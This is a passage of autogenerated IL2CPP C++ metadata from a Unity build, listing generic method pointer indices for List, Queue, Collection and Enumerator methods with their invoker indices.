3175/*(Il2CppMethodPointer)&List_1_RemoveAll_m3261187874_gshared*/, 5/*5*/}, { 3925, 3176/*(Il2CppMethodPointer)&List_1_RemoveAt_m2331128844_gshared*/, 42/*42*/}, { 3926, 3177/*(Il2CppMethodPointer)&List_1_Reverse_m3535321132_gshared*/, 0/*0*/}, { 3927, 3178/*(Il2CppMethodPointer)&List_1_Sort_m3574220472_gshared*/, 0/*0*/}, { 3928, 3179/*(Il2CppMethodPointer)&List_1_Sort_m1262985405_gshared*/, 90/*90*/}, { 3929, 3180/*(Il2CppMethodPointer)&List_1_ToArray_m3581542165_gshared*/, 4/*4*/}, { 3930, 3181/*(Il2CppMethodPointer)&List_1_TrimExcess_m2593819291_gshared*/, 0/*0*/}, { 3931, 3182/*(Il2CppMethodPointer)&List_1_get_Capacity_m2443158653_gshared*/, 3/*3*/}, { 3932, 3183/*(Il2CppMethodPointer)&List_1_set_Capacity_m3053659972_gshared*/, 42/*42*/}, { 3933, 3184/*(Il2CppMethodPointer)&List_1_get_Count_m1149731058_gshared*/, 3/*3*/}, { 3934, 3185/*(Il2CppMethodPointer)&List_1__ctor_m1739470559_gshared*/, 0/*0*/}, { 3935, 3186/*(Il2CppMethodPointer)&List_1__ctor_m3997225032_gshared*/, 42/*42*/}, { 3936, 3187/*(Il2CppMethodPointer)&List_1__cctor_m2095067232_gshared*/, 0/*0*/}, { 3937, 3188/*(Il2CppMethodPointer)&List_1_System_Collections_Generic_IEnumerableU3CTU3E_GetEnumerator_m2219076127_gshared*/, 4/*4*/}, { 3938, 3189/*(Il2CppMethodPointer)&List_1_System_Collections_ICollection_CopyTo_m1178805395_gshared*/, 86/*86*/}, { 3939, 3190/*(Il2CppMethodPointer)&List_1_System_Collections_IEnumerable_GetEnumerator_m413886046_gshared*/, 4/*4*/}, { 3940, 3191/*(Il2CppMethodPointer)&List_1_System_Collections_IList_Add_m2038396515_gshared*/, 5/*5*/}, { 3941, 3192/*(Il2CppMethodPointer)&List_1_System_Collections_IList_Contains_m4009806475_gshared*/, 1/*1*/}, { 3942, 3193/*(Il2CppMethodPointer)&List_1_System_Collections_IList_IndexOf_m2526560425_gshared*/, 5/*5*/}, { 3943, 3194/*(Il2CppMethodPointer)&List_1_System_Collections_IList_Insert_m2469433788_gshared*/, 187/*187*/}, { 3944, 3195/*(Il2CppMethodPointer)&List_1_System_Collections_IList_Remove_m4068476586_gshared*/, 90/*90*/}, { 3945, 3196/*(Il2CppMethodPointer)&List_1_System_Collections_Generic_ICollectionU3CTU3E_get_IsReadOnly_m2164218762_gshared*/, 43/*43*/}, { 3946, 3197/*(Il2CppMethodPointer)&List_1_System_Collections_ICollection_get_IsSynchronized_m363138155_gshared*/, 43/*43*/}, { 3947, 3198/*(Il2CppMethodPointer)&List_1_System_Collections_ICollection_get_SyncRoot_m1429670979_gshared*/, 4/*4*/}, { 3948, 3199/*(Il2CppMethodPointer)&List_1_System_Collections_IList_get_IsFixedSize_m1188646288_gshared*/, 43/*43*/}, { 3949, 3200/*(Il2CppMethodPointer)&List_1_System_Collections_IList_get_IsReadOnly_m1745992999_gshared*/, 43/*43*/}, { 3950, 3201/*(Il2CppMethodPointer)&List_1_System_Collections_IList_get_Item_m3333265164_gshared*/, 97/*97*/}, { 3951, 3202/*(Il2CppMethodPointer)&List_1_System_Collections_IList_set_Item_m1722990777_gshared*/, 187/*187*/}, { 3952, 3203/*(Il2CppMethodPointer)&List_1_GrowIfNeeded_m3656820735_gshared*/, 42/*42*/}, { 3953, 3204/*(Il2CppMethodPointer)&List_1_AddCollection_m257454527_gshared*/, 90/*90*/}, { 3954, 3205/*(Il2CppMethodPointer)&List_1_AddEnumerable_m36504111_gshared*/, 90/*90*/}, { 3955, 3206/*(Il2CppMethodPointer)&List_1_AsReadOnly_m1419954895_gshared*/, 4/*4*/}, { 3956, 3207/*(Il2CppMethodPointer)&List_1_Contains_m1363332942_gshared*/, 916/*916*/}, { 3957, 3208/*(Il2CppMethodPointer)&List_1_CopyTo_m2750189956_gshared*/, 86/*86*/}, { 3958, 3209/*(Il2CppMethodPointer)&List_1_Find_m160737912_gshared*/, 1605/*1605*/}, { 3959, 3210/*(Il2CppMethodPointer)&List_1_CheckMatch_m4018158235_gshared*/, 90/*90*/}, { 3960, 3211/*(Il2CppMethodPointer)&List_1_GetIndex_m2513359832_gshared*/, 1201/*1201*/}, { 3961, 3212/*(Il2CppMethodPointer)&List_1_GetEnumerator_m1075582447_gshared*/, 1606/*1606*/}, { 3962, 3213/*(Il2CppMethodPointer)&List_1_IndexOf_m1520537898_gshared*/, 1360/*1360*/}, { 3963, 3214/*(Il2CppMethodPointer)&List_1_Shift_m3453072415_gshared*/, 210/*210*/}, { 3964, 3215/*(Il2CppMethodPointer)&List_1_CheckIndex_m483190820_gshared*/, 42/*42*/}, { 3965, 3216/*(Il2CppMethodPointer)&List_1_Insert_m432478581_gshared*/, 1252/*1252*/}, { 3966, 3217/*(Il2CppMethodPointer)&List_1_CheckCollection_m818371234_gshared*/, 90/*90*/}, { 3967, 3218/*(Il2CppMethodPointer)&List_1_Remove_m1738717045_gshared*/, 916/*916*/}, { 3968, 3219/*(Il2CppMethodPointer)&List_1_RemoveAll_m2238290115_gshared*/, 5/*5*/}, { 3969, 3220/*(Il2CppMethodPointer)&List_1_RemoveAt_m2929488689_gshared*/, 42/*42*/}, { 3970, 3221/*(Il2CppMethodPointer)&List_1_Reverse_m2016509831_gshared*/, 0/*0*/}, { 3971, 3222/*(Il2CppMethodPointer)&List_1_Sort_m269561757_gshared*/, 0/*0*/}, { 3972, 3223/*(Il2CppMethodPointer)&List_1_Sort_m1483183736_gshared*/, 90/*90*/}, { 3973, 3224/*(Il2CppMethodPointer)&List_1_ToArray_m2810936944_gshared*/, 4/*4*/}, { 3974, 3225/*(Il2CppMethodPointer)&List_1_TrimExcess_m2207230550_gshared*/, 0/*0*/}, { 3975, 3226/*(Il2CppMethodPointer)&List_1_get_Capacity_m3166663676_gshared*/, 3/*3*/}, { 3976, 3227/*(Il2CppMethodPointer)&List_1_set_Capacity_m1734764639_gshared*/, 42/*42*/}, { 3977, 3228/*(Il2CppMethodPointer)&List_1__ctor_m2082969060_gshared*/, 0/*0*/}, { 3978, 3229/*(Il2CppMethodPointer)&List_1__ctor_m593058937_gshared*/, 42/*42*/}, { 3979, 3230/*(Il2CppMethodPointer)&List_1__cctor_m1022807427_gshared*/, 0/*0*/}, { 3980, 3231/*(Il2CppMethodPointer)&List_1_System_Collections_Generic_IEnumerableU3CTU3E_GetEnumerator_m4236249210_gshared*/, 4/*4*/}, { 3981, 3232/*(Il2CppMethodPointer)&List_1_System_Collections_ICollection_CopyTo_m253974980_gshared*/, 86/*86*/}, { 3982, 3233/*(Il2CppMethodPointer)&List_1_System_Collections_IEnumerable_GetEnumerator_m3903187673_gshared*/, 4/*4*/}, { 3983, 3234/*(Il2CppMethodPointer)&List_1_System_Collections_IList_Add_m3311507516_gshared*/, 5/*5*/}, { 3984, 3235/*(Il2CppMethodPointer)&List_1_System_Collections_IList_Contains_m3010726442_gshared*/, 1/*1*/}, { 3985, 3236/*(Il2CppMethodPointer)&List_1_System_Collections_IList_IndexOf_m2096960898_gshared*/, 5/*5*/}, { 3986, 3237/*(Il2CppMethodPointer)&List_1_System_Collections_IList_Insert_m2260575489_gshared*/, 187/*187*/}, { 3987, 3238/*(Il2CppMethodPointer)&List_1_System_Collections_IList_Remove_m3853980401_gshared*/, 90/*90*/}, { 3988, 3239/*(Il2CppMethodPointer)&List_1_System_Collections_Generic_ICollectionU3CTU3E_get_IsReadOnly_m1563977549_gshared*/, 43/*43*/}, { 3989, 3240/*(Il2CppMethodPointer)&List_1_System_Collections_ICollection_get_IsSynchronized_m1147262924_gshared*/, 43/*43*/}, { 3990, 3241/*(Il2CppMethodPointer)&List_1_System_Collections_ICollection_get_SyncRoot_m766733268_gshared*/, 4/*4*/}, { 3991, 3242/*(Il2CppMethodPointer)&List_1_System_Collections_IList_get_IsFixedSize_m3339043989_gshared*/, 43/*43*/}, { 3992, 3243/*(Il2CppMethodPointer)&List_1_System_Collections_IList_get_IsReadOnly_m3905377192_gshared*/, 43/*43*/}, { 3993, 3244/*(Il2CppMethodPointer)&List_1_System_Collections_IList_get_Item_m2734833597_gshared*/, 97/*97*/}, { 3994, 3245/*(Il2CppMethodPointer)&List_1_System_Collections_IList_set_Item_m4016273526_gshared*/, 187/*187*/}, { 3995, 3246/*(Il2CppMethodPointer)&List_1_GrowIfNeeded_m342928366_gshared*/, 42/*42*/}, { 3996, 3247/*(Il2CppMethodPointer)&List_1_AddCollection_m1757535174_gshared*/, 90/*90*/}, { 3997, 3248/*(Il2CppMethodPointer)&List_1_AddEnumerable_m3019862006_gshared*/, 90/*90*/}, { 3998, 3249/*(Il2CppMethodPointer)&List_1_AsReadOnly_m1406961904_gshared*/, 4/*4*/}, { 3999, 3250/*(Il2CppMethodPointer)&List_1_Contains_m2184078187_gshared*/, 1295/*1295*/}, { 4000, 3251/*(Il2CppMethodPointer)&List_1_CopyTo_m3958592053_gshared*/, 86/*86*/}, { 4001, 3252/*(Il2CppMethodPointer)&List_1_Find_m1809770055_gshared*/, 859/*859*/}, { 4002, 3253/*(Il2CppMethodPointer)&List_1_CheckMatch_m1184924052_gshared*/, 90/*90*/}, { 4003, 3254/*(Il2CppMethodPointer)&List_1_GetIndex_m433539411_gshared*/, 1201/*1201*/}, { 4004, 3255/*(Il2CppMethodPointer)&List_1_GetEnumerator_m738869388_gshared*/, 1607/*1607*/}, { 4005, 3256/*(Il2CppMethodPointer)&List_1_IndexOf_m3570614833_gshared*/, 1361/*1361*/}, { 4006, 3257/*(Il2CppMethodPointer)&List_1_Shift_m3824049528_gshared*/, 210/*210*/}, { 4007, 3258/*(Il2CppMethodPointer)&List_1_CheckIndex_m1944339753_gshared*/, 42/*42*/}, { 4008, 3259/*(Il2CppMethodPointer)&List_1_Insert_m1833581358_gshared*/, 844/*844*/}, { 4009, 3260/*(Il2CppMethodPointer)&List_1_CheckCollection_m2028764095_gshared*/, 90/*90*/}, { 4010, 3261/*(Il2CppMethodPointer)&List_1_Remove_m2802756144_gshared*/, 1295/*1295*/}, { 4011, 3262/*(Il2CppMethodPointer)&List_1_RemoveAll_m1444807780_gshared*/, 5/*5*/}, { 4012, 3263/*(Il2CppMethodPointer)&List_1_RemoveAt_m4076331586_gshared*/, 42/*42*/}, { 4013, 3264/*(Il2CppMethodPointer)&List_1_Reverse_m1170127882_gshared*/, 0/*0*/}, { 4014, 3265/*(Il2CppMethodPointer)&List_1_Sort_m2158253314_gshared*/, 0/*0*/}, { 4015, 3266/*(Il2CppMethodPointer)&List_1_Sort_m2562910171_gshared*/, 90/*90*/}, { 4016, 3267/*(Il2CppMethodPointer)&List_1_ToArray_m925997899_gshared*/, 4/*4*/}, { 4017, 3268/*(Il2CppMethodPointer)&List_1_TrimExcess_m1012566565_gshared*/, 0/*0*/}, { 4018, 3269/*(Il2CppMethodPointer)&List_1_get_Capacity_m1435386499_gshared*/, 3/*3*/}, { 4019, 3270/*(Il2CppMethodPointer)&List_1_set_Capacity_m1823402470_gshared*/, 42/*42*/}, { 4020, 3271/*(Il2CppMethodPointer)&List_1_get_Count_m1249351212_gshared*/, 3/*3*/}, { 4021, 3272/*(Il2CppMethodPointer)&Enumerator__ctor_m1424070651_AdjustorThunk*/, 90/*90*/}, { 4022, 3273/*(Il2CppMethodPointer)&Enumerator_System_Collections_IEnumerator_Reset_m603618254_AdjustorThunk*/, 0/*0*/}, { 4023, 3274/*(Il2CppMethodPointer)&Enumerator_System_Collections_IEnumerator_get_Current_m2381241800_AdjustorThunk*/, 4/*4*/}, { 4024, 3275/*(Il2CppMethodPointer)&Enumerator_Dispose_m3300818037_AdjustorThunk*/, 0/*0*/}, { 4025, 3276/*(Il2CppMethodPointer)&Enumerator_MoveNext_m3315718998_AdjustorThunk*/, 43/*43*/}, { 4026, 3277/*(Il2CppMethodPointer)&Enumerator_get_Current_m2566716693_AdjustorThunk*/, 1214/*1214*/}, { 4027, 3278/*(Il2CppMethodPointer)&Queue_1__ctor_m846705941_gshared*/, 0/*0*/}, { 4028, 3279/*(Il2CppMethodPointer)&Queue_1_System_Collections_ICollection_CopyTo_m1565496501_gshared*/, 86/*86*/}, { 4029, 3280/*(Il2CppMethodPointer)&Queue_1_System_Collections_ICollection_get_IsSynchronized_m3521628381_gshared*/, 43/*43*/}, { 4030, 3281/*(Il2CppMethodPointer)&Queue_1_System_Collections_ICollection_get_SyncRoot_m2704978441_gshared*/, 4/*4*/}, { 4031, 3282/*(Il2CppMethodPointer)&Queue_1_System_Collections_Generic_IEnumerableU3CTU3E_GetEnumerator_m1220719101_gshared*/, 4/*4*/}, { 4032, 3283/*(Il2CppMethodPointer)&Queue_1_System_Collections_IEnumerable_GetEnumerator_m593629576_gshared*/, 4/*4*/}, { 4033, 3284/*(Il2CppMethodPointer)&Queue_1_Peek_m1224538505_gshared*/, 1214/*1214*/}, { 4034, 3285/*(Il2CppMethodPointer)&Queue_1_GetEnumerator_m3210579404_gshared*/, 1608/*1608*/}, { 4035, 3286/*(Il2CppMethodPointer)&Collection_1__ctor_m340822524_gshared*/, 0/*0*/}, { 4036, 3287/*(Il2CppMethodPointer)&Collection_1_System_Collections_Generic_ICollectionU3CTU3E_get_IsReadOnly_m2091587849_gshared*/, 43/*43*/}, { 4037, 3288/*(Il2CppMethodPointer)&Collection_1_System_Collections_ICollection_CopyTo_m1047946700_gshared*/, 86/*86*/}, { 4038, 3289/*(Il2CppMethodPointer)&Collection_1_System_Collections_IEnumerable_GetEnumerator_m1756583169_gshared*/, 4/*4*/}, { 4039, 3290/*(Il2CppMethodPointer)&Collection_1_System_Collections_IList_Add_m578683352_gshared*/, 5/*5*/}, { 4040, 3291/*(Il2CppMethodPointer)&Collection_1_System_Collections_IList_Contains_m3365884450_gshared*/, 1/*1*/}, { 4041, 3292/*(Il2CppMethodPointer)&Collection_1_System_Collections_IList_IndexOf_m4075083918_gshared*/, 5/*5*/}, { 4042, 3293/*(Il2CppMethodPointer)&Collection_1_System_Collections_IList_Insert_m266942173_gshared*/, 187/*187*/}, { 4043, 3294/*(Il2CppMethodPointer)&Collection_1_System_Collections_IList_Remove_m441326653_gshared*/, 90/*90*/}, { 4044, 3295/*(Il2CppMethodPointer)&Collection_1_System_Collections_ICollection_get_IsSynchronized_m2433014468_gshared*/, 43/*43*/}, { 4045, 3296/*(Il2CppMethodPointer)&Collection_1_System_Collections_ICollection_get_SyncRoot_m3074531042_gshared*/, 4/*4*/}, { 4046, 3297/*(Il2CppMethodPointer)&Collection_1_System_Collections_IList_get_IsFixedSize_m2181653025_gshared*/, 43/*43*/}, { 4047, 3298/*(Il2CppMethodPointer)&Collection_1_System_Collections_IList_get_IsReadOnly_m781557632_gshared*/, 43/*43*/}, { 4048, 3299/*(Il2CppMethodPointer)&Collection_1_System_Collections_IList_get_Item_m3376056117_gshared*/, 97/*97*/}, { 4049, 3300/*(Il2CppMethodPointer)&Collection_1_System_Collections_IList_set_Item_m2391188074_gshared*/, 187/*187*/}, { 4050, 3301/*(Il2CppMethodPointer)&Collection_1_Add_m4031565265_gshared*/, 42/*42*/}, { 4051, 3302/*(Il2CppMethodPointer)&Collection_1_Clear_m1887013165_gshared*/, 0/*0*/}, { 4052, 3303/*(Il2CppMethodPointer)&Collection_1_ClearItems_m3685814679_gshared*/, 0/*0*/}, { 4053, 3304/*(Il2CppMethodPointer)&Collection_1_Contains_m1321776939_gshared*/, 25/*25*/}, { 4054, 3305/*(Il2CppMethodPointer)&Collection_1_CopyTo_m1840908033_gshared*/, 86/*86*/}, { 4055, 3306/*(Il2CppMethodPointer)&Collection_1_GetEnumerator_m3441330476_gshared*/, 4/*4*/}, { 4056, 3307/*(Il2CppMethodPointer)&Collection_1_IndexOf_m658556201_gshared*/, 24/*24*/}, { 4057, 3308/*(Il2CppMethodPointer)&Collection_1_Insert_m240759002_gshared*/, 210/*210*/}, { 4058, 3309/*(Il2CppMethodPointer)&Collection_1_InsertItem_m2755057283_gshared*/, 210/*210*/}, { 4059, 3310/*(Il2CppMethodPointer)&Collection_1_Remove_m1593290756_gshared*/, 25/*25*/}, { 4060, 3311/*(Il2CppMethodPointer)&Collection_1_RemoveAt_m1576816886_gshared*/, 42/*42*/}, { 4061, 3312/*(Il2CppMethodPointer)&Collection_1_RemoveItem_m3737802444_gshared*/, 42/*42*/}, { 4062, 3313/*(Il2CppMethodPointer)&Collection_1_get_Count_m3834276648_gshared*/, 3/*3*/}, { 4063, 3314/*(Il2CppMethodPointer)&Collection_1_get_Item_m1739410122_gshared*/, 24/*24*/}, { 4064, 3315/*(Il2CppMethodPointer)&Collection_1_set_Item_m2437925129_gshared*/, 210/*210*/}, { 4065, 3316/*(Il2CppMethodPointer)&Collection_1_SetItem_m1078860490_gshared*/, 210/*210*/}, { 4066, 3317/*(Il2CppMethodPointer)&Collection_1_IsValidItem_m1002882727_gshared*/, 1/*1*/}, { 4067, 3318/*(Il2CppMethodPointer)&Collection_1_ConvertItem_m3563206219_gshared*/, 5/*5*/}, { 4068, 3319/*(Il2CppMethodPointer)&Collection_1_CheckWritable_m3099004971_gshared*/, 90/*90*/}, { 4069, 3320/*(Il2CppMethodPointer)&Collection_1_IsSynchronized_m1319022347_gshared*/, 1/*1*/}, { 4070, 3321/*(Il2CppMethodPointer)&Collection_1_IsFixedSize_m393120334_gshared*/, 1/*1*/}, { 4071, 3322/*(Il2CppMethodPointer)&Collection_1__ctor_m3198200948_gshared*/, 0/*0*/}, { 4072, 3323/*(Il2CppMethodPointer)&Collection_1_System_Collections_Generic_ICollectionU3CTU3E_get_IsReadOnly_m3869278929_gshared*/, 43/*43*/}, { 4073, 3324/*(Il2CppMethodPointer)&Collection_1_System_Collections_ICollection_CopyTo_m3758640020_gshared*/, 86/*86*/}, { 4074, 3325/*(Il2CppMethodPointer)&Collection_1_System_Collections_IEnumerable_GetEnumerator_m2209987961_gshared*/, 4/*4*/}, { 4075, 3326/*(Il2CppMethodPointer)&Collection_1_System_Collections_IList_Add_m2954354104_gshared*/, 5/*5*/}, { 4076, 3327/*(Il2CppMethodPointer)&Collection_1_System_Collections_IList_Contains_m323652826_gshared*/, 1/*1*/}, { 4077, 3328/*(Il2CppMethodPointer)&Collection_1_System_Collections_IList_IndexOf_m3357535786_gshared*/, 5/*5*/}, { 4078, 3329/*(Il2CppMethodPointer)&Collection_1_System_Collections_IList_Insert_m2543097941_gshared*/, 187/*187*/}, { 4079, 3330/*(Il2CppMethodPointer)&Collection_1_System_Collections_IList_Remove_m3676148205_gshared*/, 90/*90*/}, { 4080, 3331/*(Il2CppMethodPointer)&Collection_1_System_Collections_ICollection_get_IsSynchronized_m1924133708_gshared*/, 43/*43*/}, { 4081, 3332/*(Il2CppMethodPointer)&Collection_1_System_Collections_ICollection_get_SyncRoot_m2585379274_gshared*/, 4/*4*/}, { 4082, 3333/*(Il2CppMethodPointer)&Collection_1_System_Collections_IList_get_IsFixedSize_m2408637569_gshared*/, 43/*43*/}, { 4083, 3334/*(Il2CppMethodPointer)&Collection_1_System_Collections_IList_get_IsReadOnly_m1000583304_gshared*/, 43/*43*/}, { 4084, 3335/*(Il2CppMethodPointer)&Collection_1_System_Collections_IList_get_Item_m2415649949_gshared*/, 97/*97*/}, { 4085, 3336/*(Il2CppMethodPointer)&Collection_1_System_Collections_IList_set_Item_m3488446830_gshared*/, 187/*187*/}, { 4086, 3337/*(Il2CppMethodPointer)&Collection_1_Add_m2613548553_gshared*/, 1374/*1374*/}, { 4087, 3338/*(Il2CppMethodPointer)&Collection_1_Clear_m3860339101_gshared*/, 0/*0*/}, { 4088, 3339/*(Il2CppMethodPointer)&Collection_1_ClearItems_m2359888219_gshared*/, 0/*0*/}, { 4089, 3340/*(Il2CppMethodPointer)&Collection_1_Contains_m1652249119_gshared*/, 1268/*1268*/}, { 4090, 3341/*(Il2CppMethodPointer)&Collection_1_CopyTo_m2993977545_gshared*/, 86/*86*/}, { 4091, 3342/*(Il2CppMethodPointer)&Collection_1_GetEnumerator_m914650748_gshared*/, 4/*4*/}, { 4092, 3343/*(Il2CppMethodPointer)&Collection_1_IndexOf_m238348105_gshared*/, 1332/*1332*/}, { 4093, 3344/*(Il2CppMethodPointer)&Collection_1_Insert_m3594407958_gshared*/, 1414/*1414*/}, { 4094, 3345/*(Il2CppMethodPointer)&Collection_1_InsertItem_m1391780791_gshared*/, 1414/*1414*/}, { 4095, 3346/*(Il2CppMethodPointer)&Collection_1_Remove_m3895219432_gshared*/, 1268/*1268*/}, { 4096, 3347/*(Il2CppMethodPointer)&Collection_1_RemoveAt_m290627370_gshared*/, 42/*42*/}, { 4097, 3348/*(Il2CppMethodPointer)&Collection_1_RemoveItem_m4097730824_gshared*/, 42/*42*/}, { 4098, 3349/*(Il2CppMethodPointer)&Collection_1_get_Count_m1539014344_gshared*/, 3/*3*/}, { 4099, 3350/*(Il2CppMethodPointer)&Collection_1_get_Item_m1154492510_gshared*/, 1476/*1476*/}, { 4100, 3351/*(Il2CppMethodPointer)&Collection_1_set_Item_m4170293313_gshared*/, 1414/*1414*/}, { 4101, 3352/*(Il2CppMethodPointer)&Collection_1_SetItem_m2643403726_gshared*/, 1414/*1414*/}, { 4102, 3353/*(Il2CppMethodPointer)&Collection_1_IsValidItem_m2254106115_gshared*/, 1/*1*/}, { 4103, 3354/*(Il2CppMethodPointer)&Collection_1_ConvertItem_m2308084327_gshared*/, 1591/*1591*/}, { 4104, 3355/*(Il2CppMethodPointer)&Collection_1_CheckWritable_m2756357359_gshared*/, 90/*90*/}, { 4105, 3356/*(Il2CppMethodPointer)&Collection_1_IsSynchronized_m2601980439_gshared*/, 1/*1*/}, { 4106, 3357/*(Il2CppMethodPointer)&Collection_1_IsFixedSize_m1690655146_gshared*/, 1/*1*/}, { 4107, 3358/*(Il2CppMethodPointer)&Collection_1__ctor_m2818834331_gshared*/, 0/*0*/}, { 4108, 3359/*(Il2CppMethodPointer)&Collection_1_System_Collections_Generic_ICollectionU3CTU3E_get_IsReadOnly_m4096071066_gshared*/, 43/*43*/}, { 4109, 3360/*(Il2CppMethodPointer)&Collection_1_System_Collections_ICollection_CopyTo_m3896480607_gshared*/, 86/*86*/}, { 4110, 3361/*(Il2CppMethodPointer)&Collection_1_System_Collections_IEnumerable_GetEnumerator_m1624138998_gshared*/, 4/*4*/}, { 4111, 3362/*(Il2CppMethodPointer)&Collection_1_System_Collections_IList_Add_m1527796839_gshared*/, 5/*5*/}, { 4112, 3363/*(Il2CppMethodPointer)&Collection_1_System_Collections_IList_Contains_m439054215_gshared*/, 1/*1*/}, { 4113, 3364/*(Il2CppMethodPointer)&Collection_1_System_Collections_IList_IndexOf_m1667133881_gshared*/, 5/*5*/}, { 4114, 3365/*(Il2CppMethodPointer)&Collection_1_System_Collections_IList_Insert_m3303840316_gshared*/, 187/*187*/}, { 4115, 3366/*(Il2CppMethodPointer)&Collection_1_System_Collections_IList_Remove_m698976938_gshared*/, 90/*90*/}, { 4116, 3367/*(Il2CppMethodPointer)&Collection_1_System_Collections_ICollection_get_IsSynchronized_m1622338911_gshared*/, 43/*43*/}, { 4117, 3368/*(Il2CppMethodPointer)&Collection_1_System_Collections_ICollection_get_SyncRoot_m815502691_gshared*/, 4/*4*/}, { 4118, 3369/*(Il2CppMethodPointer)&Collection_1_System_Collections_IList_get_IsFixedSize_m1624702704_gshared*/, 43/*43*/}, { 4119, 3370/*(Il2CppMethodPointer)&Collection_1_System_Collections_IList_get_IsReadOnly_m2329986891_gshared*/, 43/*43*/}, { 4120, 3371/*(Il2CppMethodPointer)&Collection_1_System_Collections_IList_get_Item_m416006758_gshared*/, 97/*97*/}, { 4121, 3372/*(Il2CppMethodPointer)&Collection_1_System_Collections_IList_set_Item_m4023328701_gshared*/, 187/*187*/}, { 4122, 3373/*(Il2CppMethodPointer)&Collection_1_Add_m1895146768_gshared*/, 1375/*1375*/}, { 4123, 3374/*(Il2CppMethodPointer)&Collection_1_Clear_m2734620236_gshared*/, 0/*0*/}, { 4124, 3375/*(Il2CppMethodPointer)&Collection_1_ClearItems_m3585785594_gshared*/, 0/*0*/}, { 4125, 3376/*(Il2CppMethodPointer)&Collection_1_Contains_m1423522454_gshared*/, 1269/*1269*/}, { 4126, 3377/*(Il2CppMethodPointer)&Collection_1_CopyTo_m2028291972_gshared*/, 86/*86*/}, { 4127, 3378/*(Il2CppMethodPointer)&Collection_1_GetEnumerator_m434271983_gshared*/, 4/*4*/}, { 4128, 3379/*(Il2CppMethodPointer)&Collection_1_IndexOf_m1048636762_gshared*/, 1333/*1333*/}, { 4129, 3380/*(Il2CppMethodPointer)&Collection_1_Insert_m1916633065_gshared*/, 1415/*1415*/}, { 4130, 3381/*(Il2CppMethodPointer)&Collection_1_InsertItem_m1775683682_gshared*/, 1415/*1415*/}, { 4131, 3382/*(Il2CppMethodPointer)&Collection_1_Remove_m3616495577_gshared*/, 1269/*1269*/}, { 4132, 3383/*(Il2CppMethodPointer)&Collection_1_RemoveAt_m1095666101_gshared*/, 42/*42*/}, { 4133, 3384/*(Il2CppMethodPointer)&Collection_1_RemoveItem_m3378524409_gshared*/, 42/*42*/}, { 4134, 3385/*(Il2CppMethodPointer)&Collection_1_get_Count_m4168522791_gshared*/, 3/*3*/}, { 4135, 3386/*(Il2CppMethodPointer)&Collection_1_get_Item_m2293587641_gshared*/, 1477/*1477*/}, { 4136, 3387/*(Il2CppMethodPointer)&Collection_1_set_Item_m3803272710_gshared*/, 1415/*1415*/}, { 4137, 3388/*(Il2CppMethodPointer)&Collection_1_SetItem_m1694051437_gshared*/, 1415/*1415*/}, { 4138, 3389/*(Il2CppMethodPointer)&Collection_1_IsValidItem_m1304951912_gshared*/, 1/*1*/}, { 4139, 3390/*(Il2CppMethodPointer)&Collection_1_ConvertItem_m2185647560_gshared*/, 1593/*1593*/}, { 4140, 3391/*(Il2CppMethodPointer)&Collection_1_CheckWritable_m2334289660_gshared*/, 90/*90*/}, { 4141, 3392/*(Il2CppMethodPointer)&Collection_1_IsSynchronized_m3261594010_gshared*/, 1/*1*/}, { 4142, 3393/*(Il2CppMethodPointer)&Collection_1_IsFixedSize_m162922409_gshared*/, 1/*1*/}, { 4143, 3394/*(Il2CppMethodPointer)&Collection_1__ctor_m3403655424_gshared*/, 0/*0*/}, { 4144, 3395/*(Il2CppMethodPointer)&Collection_1_System_Collections_Generic_ICollectionU3CTU3E_get_IsReadOnly_m2730249519_gshared*/, 43/*43*/}, { 4145, 3396/*(Il2CppMethodPointer)&Collection_1_System_Collections_ICollection_CopyTo_m1335644572_gshared*/, 86/*86*/}, { 4146, 3397/*(Il2CppMethodPointer)&Collection_1_System_Collections_IEnumerable_GetEnumerator_m1812936427_gshared*/, 4/*4*/}, { 4147, 3398/*(Il2CppMethodPointer)&Collection_1_System_Collections_IList_Add_m669232520_gshared*/, 5/*5*/}, { 4148, 3399/*(Il2CppMethodPointer)&Collection_1_System_Collections_IList_Contains_m4223806958_gshared*/, 1/*1*/}, { 4149, 3400/*(Il2CppMethodPointer)&Collection_1_System_Collections_IList_IndexOf_m51140022_gshared*/, 5/*5*/}, { 4150, 3401/*(Il2CppMethodPointer)&Collection_1_System_Collections_IList_Insert_m2140320323_gshared*/, 187/*187*/}, { 4151, 3402/*(Il2CppMethodPointer)&Collection_1_System_Collections_IList_Remove_m1901189211_gshared*/, 90/*90*/}, { 4152, 3403/*(Il2CppMethodPointer)&Collection_1_System_Collections_ICollection_get_IsSynchronized_m1266213776_gshared*/, 43/*43*/}, { 4153, 3404/*(Il2CppMethodPointer)&Collection_1_System_Collections_ICollection_get_SyncRoot_m2547259708_gshared*/, 4/*4*/}, { 4154, 3405/*(Il2CppMethodPointer)&Collection_1_System_Collections_IList_get_IsFixedSize_m2778306027_gshared*/, 43/*43*/}, { 4155, 3406/*(Il2CppMethodPointer)&Collection_1_System_Collections_IList_get_IsReadOnly_m474868292_gshared*/, 43/*43*/}, { 4156, 3407/*(Il2CppMethodPointer)&Collection_1_System_Collections_IList_get_Item_m2254776227_gshared*/, 97/*97*/}, { 4157, 3408/*(Il2CppMethodPointer)&Collection_1_System_Collections_IList_set_Item_m367940682_gshared*/, 187/*187*/}, { 4158, 3409/*(Il2CppMethodPointer)&Collection_1_Add_m3182287887_gshared*/, 1254/*1254*/}, { 4159, 3410/*(Il2CppMethodPointer)&Collection_1_Clear_m3317293907_gshared*/, 0/*0*/}, { 4160, 3411/*(Il2CppMethodPointer)&Collection_1_ClearItems_m1410275009_gshared*/, 0/*0*/}, { 4161, 3412/*(Il2CppMethodPointer)&Collection_1_Contains_m3292349561_gshared*/, 1282/*1282*/}, { 4162, 3413/*(Il2CppMethodPointer)&Collection_1_CopyTo_m2282972507_gshared*/, 86/*86*/}, { 4163, 3414/*(Il2CppMethodPointer)&Collection_1_GetEnumerator_m1480796052_gshared*/, 4/*4*/}, { 4164, 3415/*(Il2CppMethodPointer)&Collection_1_IndexOf_m688835775_gshared*/, 1346/*1346*/}, { 4165, 3416/*(Il2CppMethodPointer)&Collection_1_Insert_m44548038_gshared*/, 1253/*1253*/}, { 4166, 3417/*(Il2CppMethodPointer)&Collection_1_InsertItem_m2583364417_gshared*/, 1253/*1253*/}, { 4167, 3418/*(Il2CppMethodPointer)&Collection_1_Remove_m4136193368_gshared*/, 1282/*1282*/}, { 4168, 3419/*(Il2CppMethodPointer)&Collection_1_RemoveAt_m2298154778_gshared*/, 42/*42*/}, { 4169, 3420/*(Il2CppMethodPointer)&Collection_1_RemoveItem_m2290432436_gshared*/, 42/*42*/}, { 4170, 